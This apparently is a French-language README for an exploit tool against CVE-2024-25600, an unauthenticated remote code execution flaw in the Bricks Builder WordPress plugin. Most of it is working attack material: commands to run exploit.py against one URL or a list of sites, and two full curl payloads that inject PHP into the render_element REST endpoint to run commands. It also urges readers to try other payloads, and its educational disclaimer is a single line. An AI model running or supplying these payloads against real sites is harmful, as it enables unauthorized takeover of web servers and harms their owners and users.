
Cet outil est conçu pour exploiter la vulnérabilité CVE-2024-25600 présente dans le plugin Bricks Builder pour WordPress. Cette vulnérabilité permet l'exécution de code à distance non authentifiée sur les sites web affectés. L'outil automatise le processus d'exploitation en récupérant des nonces et en envoyant des requêtes spécialement conçues pour exécuter des commandes arbitraires.
Cet outil 🛠️ est conçu pour exploiter la vulnérabilité CVE-2024-25600 🕳️ présente dans le plugin Bricks Builder pour WordPress. Cette vulnérabilité permet une exécution de code à distance non authentifiée sur les sites web affectés 💻. L'outil automatise le processus d'exploitation en récupérant des nonces et en envoyant des requêtes spécialement conçues pour exécuter des commandes arbitraires.
git clone.pip install -r requirements.txt.python exploit.py -u <URL> pour démarrer le mode interactif.python exploit.py -l <chemin_fichier> pour analyser et exploiter les sites listés.La preuve de concept de base fournie par la divulgation est la suivante :
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Mise à jour : Deuxième PoC (plus fiable)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Il est possible que des charges utiles supplémentaires donnent de meilleurs résultats. Si mon exploit ou ma preuve de concept ne fonctionne pas pour vous, je vous encourage à expérimenter avec d'autres charges utiles pour trouver une solution plus efficace.
Remplacez [HOST] par le site cible et [NONCE] par la valeur du nonce récupérée du site.
Pour plus d'informations sur la vulnérabilité CVE-2024-25600, veuillez consulter la divulgation détaillée sur Snicco.io.
Les informations fournies dans ce README sont uniquement à des fins éducatives. Le piratage non autorisé de sites web ou de réseaux est illégal et contraire à l'éthique. 🚫
Félicitations aux chercheurs en sécurité qui ont découvert et signalé cette vulnérabilité, fournissant à la communauté des informations et des outils pour sécuriser leurs applications web.